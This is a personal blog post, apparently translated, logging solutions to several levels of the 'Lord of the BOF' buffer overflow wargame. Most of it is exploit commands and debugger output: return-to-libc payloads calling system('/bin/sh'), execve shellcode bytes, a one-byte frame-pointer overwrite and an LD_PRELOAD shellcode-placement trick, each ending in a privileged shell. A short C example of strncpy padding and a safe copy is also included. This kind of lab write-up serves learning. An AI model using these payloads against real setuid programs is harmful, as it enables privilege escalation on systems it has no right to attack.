
Yes,

Uh.. (shocked)

Phew...

This is hard, heh..

The log is a bit messy, so I'll tidy it up with line breaks.

Thanks to popopret, who chatted with me while I solved this, gave me a taste (?) of knowledge and new hacking techniques, and helped me understand it :D [(http://netstat.tistory.com) ☜ an awesome blog with tons of material, go check it out]

[bugbear@localhost bugbear]$ ls

assassas  core  ggggg  ggggg.c  giant  giant.c  grant  grant.c  grantz /* I kept getting a permission error on the copy, so I modified grant.c to link to grantz, but that was unnecessary.. execve's address is the same whether you change it or not.. doh */


[bugbear@localhost bugbear]$ payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [&/bin//sh] [null]

[1] 807

bash2: [/bin//sh,: No such file or directory

bash2: /bin//sh]: No such file or directory

[1]+  Exit 127                payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [



[bugbear@localhost bugbear]$ vi whereis.c

[bugbear@localhost bugbear]$ gcc whereis.c -o whereis

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast


[bugbear@localhost bugbear]$ export BINSH=`perl -e 'print "/bin/sh"'`

[bugbear@localhost bugbear]$ ./whereis BINSH

the env is at: 0xbffffc75



[bugbear@localhost bugbear]$ payload= [binsh addr] [nullx4] [nopx36] [execve] [dummy] [binsh addr] [argv[1]addr] [null addr]

bash2: [binsh: command not found

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\x00"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

You must use execve!

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", " "x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿    H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped) /* Lesson learned here: nulls don't go into argv[1]. Heh */

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\xff"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿    H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped)


[bugbear@localhost bugbear]$ gdb -q `perl -e 'print "\x75\xfc\xff\xbf"'` core

Core was generated by `./uü ¿ H

@AAAAuü ¿øû ¿0x51û ¿'. /* So for now I also tried it via argv[0], but since I still don't really know the method, I used the trick p0p0pret showed me yesterday. (a hack) */

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x41414141 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048566

(gdb) r

Starting program: /home/bugbear/uü ¿


Breakpoint 1, 0x8048566 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[bugbear@localhost bugbear]$ ./`perl -e 'print "\x75\xfc\xff\xbf"'` "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "AAAA", "\x75\xfc\xff\xbf"')"

H

@@AAAAuü ¿

Segmentation fault (core dumped)


(snip...)


[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x78\xfc\xff\xbf"')"

H

@@uü ¿xü ¿

sh: =/bin/sh: No such file or directory

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./giant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ whoami

giant

bash$ my-pass

euid = 514


Explanation of the method: the textbook way is to pass all of execve's arguments via RTL and get the privileges that way. But let's look at the RTL technique.

If the form is [buffer] [sfp] [ret(function)] [dummy] [argument] [argument2] [argument3]...

then the payload has to be built in this form: [nop~~~~~~][execve~~~~][system] [execve arg][system arg].

This way execve does get called, but since its arguments aren't properly in place it doesn't execute successfully (execve really takes three arguments, but here there's only one). Still, the program keeps running and goes on to use the return address in the slot that would normally hold the dummy (or exit). Normally that return would terminate the program, but with this payload it doesn't terminate and calls system instead (because system's address sits in that ret slot). Then system looks for its argument in the slot after system (system+4). So system receives its own argument (the address of /bin/sh) correctly and runs system("/bin/sh"). Hence the result: a shell pops! (hack hack)


Looking at other solutions, hmm, I think I understand what's going on, but it seems too hard to do right now. Doing it without fully understanding it also feels wrong... I'll have to keep grinding away.


Heheh

It feels good to have solved the RTL one. I fumbled around a bit at first, but it worked out, so I'm happy!

login: darkknight

Password:

Last login: Sun Mar 16 07:20:14 from 192.168.10.1

[darkknight@localhost darkknight]$ ls -al

total 44

drwx------    2 darkknig darkknig     4096 Mar 29  2010 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-r--r--    1 darkknig darkknig       24 Mar  2  2010 .bash_logout

-rw-r--r--    1 darkknig darkknig      230 Mar  2  2010 .bash_profile

-rw-r--r--    1 darkknig darkknig      124 Mar  2  2010 .bashrc

-rwxr-xr-x    1 darkknig darkknig      333 Mar  2  2010 .emacs

-rw-r--r--    1 darkknig darkknig     3394 Mar  2  2010 .screenrc

-rwsr-sr-x    1 bugbear  bugbear     12043 Mar  8  2010 bugbear

-rw-r--r--    1 root     root          385 Mar 29  2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf') // now you can't use 0xbf... addresses at all.

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ cp bugbear bugbeer

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`



Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ gdb -q bugbeer core

Core was generated by `./bugbeer '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/bugbeer


Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument

bash: nopx44,: command not found

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`

@AAAABBBB

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`

[darkknight@localhost darkknight]$ ./env ARG

ARG: 0xbffffc9d

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`

@AAAAžü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped) // I guessed... a little.. lol

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ my-pass

euid = 513


Woooo yeahhh (keyboard mashing) lol


Wow..

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

Read this. You'll get it right away.

Wow...

Wowww...

Pulling an all-nighter was worth it?!

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkknight

        - FPO

*/


#include <stdio.h>

#include <stdlib.h>


void problem_child(char *src)

{

        char buffer[40];

        strncpy(buffer, src, 41); /* strncpy(dest, source, # of bytes) - copies 41 bytes from argv[1] into the buffer. The buffer is 40 bytes, so the one trailing byte overflows into the saved frame pointer that this function uses to return to main */

        printf("%s\n", buffer);

}


main(int argc, char *argv[])

{

        if(argc<2){


                printf("argv error\n");

                exit(0);

        }


        problem_child(argv[1]);

}

[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`

ü ¿j

                  X™Rh//shh/bin‰RS‰Í̀†ú ¿žMü ¿û ¿       @

Segmentation fault (core dumped)

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight ü ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀††'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xfc764000 in ?? ()

(gdb) x/40wx $esp

0xbffffa8e:     0xfaecbfff      0xd920bfff      0x43e04005      0xfab44001

0xbffffa9e:     0x6070bfff      0x69804006      0x85004010      0xfac40804

0xbffffaae:     0x81ecbfff      0xfaec4010      0x8466bfff      0x85000804

0xbffffabe:     0xfac40804      0xfc90bfff      0x9090bfff      0x90909090 // argv[1] can be seen here

0xbfffface:     0x90909090      0x6a909090      0x5299580b      0x732f2f68

0xbffffade:     0x622f6868      0xe3896e69      0xe1895352      0xfa8680cd

0xbffffaee:     0x849ebfff      0xfc4d0804      0xfb18bfff      0x09cbbfff

0xbffffafe:     0x00024003      0xfb440000      0xfb50bfff      0x3868bfff

0xbffffb0e:     0x00024001      0x83900000      0x00000804      0x83b10000

0xbffffb1e:     0x846c0804      0x00020804      0xfb440000      0x82e4bfff

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

Illegal instruction (core dumped)

[golem@localhost golem]$ gdb -q a.out core


warning: core file may not match specified executable file.

Core was generated by `./porkknight úú ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀À'.

Program terminated with signal 4, Illegal instruction.

#0  0xbffffac4 in ?? ()

(gdb) z

[1]+  Stopped                 gdb -q a.out core

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight úú ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀À'.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffac4 in ?? ()

(gdb) x/40wx $esp

0xbffffac8:     0x90909090      0x90909090      0x90909090      0x580b6a90

0xbffffad8:     0x2f685299      0x6868732f      0x6e69622f      0x5352e389

0xbffffae8:     0x80cde189      0xbffffac0      0x0804849e      0xbffffc4d

0xbffffaf8:     0xbffffb18      0x400309cb      0x00000002      0xbffffb44

0xbffffb08:     0xbffffb50      0x40013868      0x00000002      0x08048390

0xbffffb18:     0x00000000      0x080483b1      0x0804846c      0x00000002

0xbffffb28:     0xbffffb44      0x080482e4      0x080484dc      0x4000ae60

0xbffffb38:     0xbffffb3c      0x40013e90      0x00000002      0xbffffc40

0xbffffb48:     0xbffffc4d      0x00000000      0xbffffc78      0xbffffc88

0xbffffb58:     0xbffffca0      0xbffffcbf      0xbffffce1      0xbffffcec

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

bash$ gjf

sh: gjf: command not found

bash$ exit

exit

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

bash$ my-pass

euid = 512




Notes I took while doing this one:

argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

has to add up to 41 bytes


23 bytes (shellcode) + 4 bytes (argv[1] address) = 27 bytes

13 bytes (nop)


It segfaulted even when I put nothing in, so I traced it to see why, and it was because strncpy just keeps going and fills in the rest with garbage.. stupid stupid dumb strncpy


strace ./porkknight `perl -e 'print "AAAA"'` -i
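As an added illustration of the strncpy behaviour this level turns on (example code, not the wargame's source or anything from this post), the C program below rebuilds the frame of problem_child() as a struct: 40 bytes of buffer followed by one byte standing in for the low byte of the saved frame pointer. That stand-in byte, its assumed original value 0xfa, and the test inputs are all constructed here. It shows two facts at once: strncpy pads with NUL bytes up to the requested length, so even a short argument such as "AAAA" zeroes the 41st byte, and with 41 or more bytes it puts the caller's byte there and leaves buffer without a terminator (which is why printf("%s") then reads on past it). The hardened form bounds the copy by the destination size and writes the terminator itself.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the frame of problem_child() in darkknight.c:
   a 40-byte buffer followed by one byte that plays the role of the low
   byte of the saved frame pointer. Keeping that byte inside the struct
   means the demo never writes out of bounds, yet strncpy(..., 41) still
   reaches it exactly as in the level. */
struct frame {
    char buffer[40];
    unsigned char sfp_low; /* the byte that sits right after buffer */
};

#define SFP_LOW_ORIGINAL 0xfa /* assumed original low byte of the saved ebp */
#define LEVEL_BOUND 41        /* the bound the level passes to strncpy */

/* strlen with an upper bound; written out so the block needs only ISO C */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Runs the level's copy, strncpy(buffer, src, 41), on a fresh frame and
   returns what the stand-in saved-frame-pointer byte holds afterwards. */
unsigned char sfp_after_copy(const char *src)
{
    struct frame f;
    f.sfp_low = SFP_LOW_ORIGINAL;
    /* 41 bytes into a 41-byte object: the first 40 are buffer, the 41st is
       the frame pointer byte. strncpy pads with NULs when src is shorter. */
    strncpy((char *)&f, src, LEVEL_BOUND);
    return f.sfp_low;
}

/* Returns 1 if buffer still contains a NUL terminator after the level's
   copy, 0 if strncpy left it unterminated. */
int buffer_terminated_after_copy(const char *src)
{
    struct frame f;
    f.sfp_low = SFP_LOW_ORIGINAL;
    strncpy((char *)&f, src, LEVEL_BOUND);
    return memchr(f.buffer, '\0', sizeof f.buffer) != NULL;
}

/* The same strncpy used correctly: the bound is one less than the
   destination so the terminator always fits, the terminator is written
   explicitly, and the caller learns whether src was truncated (1) or not (0). */
int strncpy_fixed(char *dst, size_t dstsz, const char *src)
{
    strncpy(dst, src, dstsz - 1);
    dst[dstsz - 1] = '\0';
    return bounded_len(src, dstsz) >= dstsz;
}

/* Fixed copy into a 40-byte buffer like the level's: the truncation flag */
int fixed_copy_truncated(const char *src)
{
    char buffer[40];
    return strncpy_fixed(buffer, sizeof buffer, src);
}

/* Fixed copy into a 40-byte buffer like the level's: length of the result,
   which proves the result is terminated and never longer than 39 */
size_t fixed_copy_len(const char *src)
{
    char buffer[40];
    strncpy_fixed(buffer, sizeof buffer, src);
    return strlen(buffer);
}

int main(void)
{
    /* constructed inputs: a short argument and a 41-byte one (40 'A' + 'Z') */
    const char *short_arg = "AAAA";
    const char *long_arg = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "Z";

    printf("\"AAAA\": sfp byte becomes 0x%02x, buffer terminated = %d\n",
           sfp_after_copy(short_arg), buffer_terminated_after_copy(short_arg));
    printf("41 bytes: sfp byte becomes 0x%02x ('%c'), buffer terminated = %d\n",
           sfp_after_copy(long_arg), sfp_after_copy(long_arg),
           buffer_terminated_after_copy(long_arg));
    printf("fixed copy of 41 bytes: truncated = %d, result length = %zu\n",
           fixed_copy_truncated(long_arg), fixed_copy_len(long_arg));
    return 0;
}
```

A 40-byte argument is the interesting middle case: strncpy copies all 40 characters and then writes its single NUL of padding exactly onto the frame-pointer byte, so the buffer is unterminated and the saved ebp is clobbered at the same time.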



The paper I took notes on lol. It only looks like a lot of doodles, and my mom later threw it away asking why it was so messy lol

There's a halo around LeaveRet, can you see it


Feels good

Now I have to write an essay, two more pages, I'm doomed, it's 2 AM, I have to print it too, doomed

At first I read the FPO doc for this problem and didn't get it, looked at a solution and still didn't get it, so I just read the FPO doc really hard, and then the stack started drawing itself in my head, I could follow ebp, I could picture what esp was doing, wooaahh (keyboard mashing), I could see the stack growing and what leave/ret does, wow this one was really something. So in the end I didn't even remember the solution and just solved it on my own. Ah, feels so good


..

..who am I..?

...where is this....?


Huge thanks to cd80, who shed a ray of light on this problem (and on all the problems, really).

I still don't know how to use LD_PRELOAD though. I think I get it, but I haven't tried it. I should.

[(http://cd80.tistory.com) ☜☜ an amazing system hacker's blog! click click]


Log:

// When I first looked at the source I didn't understand what the memset part meant, so I commented the source heavily.

#include <stdio.h>

#include <stdlib.h>


extern char **environ; 


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n"); // fewer than 2 arguments, bye bye!! :D

exit(0);

}


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n"); // the 48th byte must be \xbf

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // stack destroyer!

        memset(buffer, 0, 44); // wipes 44 bytes of the buffer - buffer+sfp

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));


/* and it also destroys everything after the return address.

It's memset(dest, value, amount), and 0xbfffffff - (int)(buffer+48) means it destroys everything over the distance from buffer+48 to 0xbfffffff. Hopeless */

}


[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`

[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so 

// here I put the shellcode and nop sled. It makes it easier to find. Ride the sled

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so 

// put the shellcode blob in LD_PRELOAD.

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                     X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) q

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                                                                                                                         X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000:     Cannot access memory at address 0xbfff0000

(gdb) x/100wx 0xbffff000

0xbffff000:     0x000005c9      0x0000029f      0x000006a6      0x0000045f

0xbffff010:     0x000006dd      0x000004a6      0x00000000      0x00000620

0xbffff020:     0x0000051e      0x00000000      0x00000584      0x0000069c

[snip..]

0xbffff610:     0x6b732f65      0x74656c65      0x902f6e6f      0x90909090

0xbffff620:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff630:     0x90909090      0x90909090      0x90909090      0x90909090

(gdb)

0xbffff640:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff650:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff660:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff670:     0x90909090      0x90909090      0x90909090      0x6a909090

0xbffff680:     0x5299580b      0x732f2f68      0x622f6868      0xe3896e69

0xbffff690:     0xe1895352      0x732e80cd      0x4000006f      0x40013868

0xbffff6a0:     0x4000220c      0xbffffbd1      0x00000000      0x00000000

0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006

0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001

0xbffff710:     0xbffff608      0x00060000      0x00000000      0x00000000

(gdb) q

[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

#include<stdio.h>

int main()

{

printf ("wat do i do");

return 31337;

} // what a silly source file

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                                                                                                                         X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000:     Cannot access memory at address 0xbfff0000

(gdb)

0xbfff0004:     Cannot access memory at address 0xbfff0004

(gdb) x/100wx 0xbfff5000

0xbfff5000:     Cannot access memory at address 0xbfff5000

(gdb) x/100wx 0xbfff9000

0xbfff9000:     Cannot access memory at address 0xbfff9000

(gdb) x/100wx 0xbfffb000

0xbfffb000:     Cannot access memory at address 0xbfffb000

(gdb) x/100wx 0xbfffd000

0xbfffd000:     Cannot access memory at address 0xbfffd000

(gdb) x/100wx 0xbffff000 // walking up the stack one step at a time like this

0xbffff000:     0x000005c9      0x0000029f      0x000006a6      0x0000045f

0xbffff010:     0x000006dd      0x000004a6      0x00000000      0x00000620

0xbffff020:     0x0000051e      0x00000000      0x00000584      0x0000069c

0xbffff030:     0x00000716      0x0000054d      0x00000527      0x000004ed

0xbffff040:     0x000003a1      0x00000458      0x00000466      0x0000063f

0xbffff050:     0x00000000      0x000001ca      0x00000000      0x0000027f

[snip..]

0xbffff600:     0x6b732f65      0x74656c65      0x902f6e6f      0x90909090

0xbffff610:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff620:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff630:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff640:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff650:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff660:     0x90909090      0x90909090      0x90909090      0x6a909090

0xbffff670:     0x5299580b      0x732f2f68      0x622f6868      0xe3896e69

0xbffff680:     0xe1895352      0x732e80cd      0x4000006f      0x40013868

0xbffff690:     0x4000220c      0xbffffbbc      0x00000000      0x00000000

0xbffff6a0:     0x00000000      0x00000000      0x40014a00      0x00000000

0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000006

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6f0:     0x00000000      0x00000001      0x00000000      0x00000001

0xbffff700:     0xbffff5f8      0x00060000      0x00000000      0x00000000

0xbffff710:     0x00000000      0x00000001      0x00000000      0x00000000

0xbffff720:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff730:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff740:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff750:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff760:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff770:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff780:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) q

The program is running.  Exit anyway? (y or n) y

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ q

sh: q: command not found

bash$ exit

exit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ my-pass

euid = 511                                                                                                                                        


Even after I knew the method I flailed around a lot. At first I was laughing, like "so what, am I supposed to hook a function in the source? lol no way lol", but LD_PRELOAD is an environment variable, right. So I just set the shared library name to the shellcode, and since I understand this is dynamically linked, the shellcode didn't show up.. which is a lie; now that I look, it's sitting right there nicely. What on earth was I doing.

Anyway, LD_PRELOAD pulls in a shared library before the program runs and tucks it away on the stack. From what I found, it just leaves residue on the stack, and the reason is said to be somewhat complicated. So, um, all I had to do was make the shared library's filename the shellcode. Right. ㅠ. Since I only read the method in a writeup and then tried it, I can't say I solved it myself, but it's a technique I'd like to use again. It's slick. I panicked when I first saw the code, but I think I'm over that too. It was a mess in many ways, but I'm proud. Thanks for reading my rambling. I'm hungry. Good night everyone, may peace be upon your homes.


Gasp gasp gasp hahaha

This was the problem I grinded on for months until I thought, damn, I guess I have no talent!!!!!!!!!!!!!!!!!

Uwaaah (keyboard mashing)!!!!!!!!!!!!

Solved it!!!!!!!!!!!!!!!

(keyboard mashing)


For the shellcode, the one without 2f that I used last time somehow didn't work,, and I had learned the symbolic link trick for shellcode containing 2f, but my hands and brain are useless and I couldn't remember it, so after much grinding I took it from a solution. Shellcode source: http://john-data.tistory.com/187

I didn't look at the solution hehehehe. I tried to, but there was so much explanation that I just dropped everything, dropped my school project too, and was about to just beat this one down when hehehehe

Enough chatter, here's the cleaned-up log.


// bash 2, ./ssssssss is a copy.

[vampire@localhost vampire]$ ls

skeleton  skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i, saved_argc;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        // argc saver

        saved_argc = argc;


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40); // buffer wiped


        // ultra argv hunter!

        for(i=0; i<saved_argc; i++)

